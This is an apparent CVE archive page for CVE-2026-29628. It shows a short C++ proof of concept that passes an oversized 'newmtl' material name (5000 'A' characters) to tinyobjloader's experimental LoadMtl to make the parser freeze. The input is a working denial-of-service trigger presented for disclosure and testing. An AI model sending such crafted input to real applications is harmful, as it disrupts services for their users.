5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-29628
README.md
Rendering markdown...
POC / poc.cpp CPP
⬇ Raw GitHub ✕ Close 
#include <iostream>
#include <sstream>
#include <string>
#include <vector>
#include <map>

#define TINYOBJ_LOADER_OPT_IMPLEMENTATION
#include "tinyobjloader/experimental/tinyobj_loader_opt.h"

int main(int argc, char** argv) {
    std::string malicious_content = "newmtl " + std::string(5000, 'A');
    std::istringstream malicious_stream(malicious_content);

    std::map<std::string, int> material_map;
    std::vector<tinyobj_opt::material_t> materials;

    std::cout << "It should freeze now" << std::endl;
    tinyobj_opt::LoadMtl(&material_map, &materials, &malicious_stream);

    std::cout << "The POC failed" << std::endl;

    return 0;
}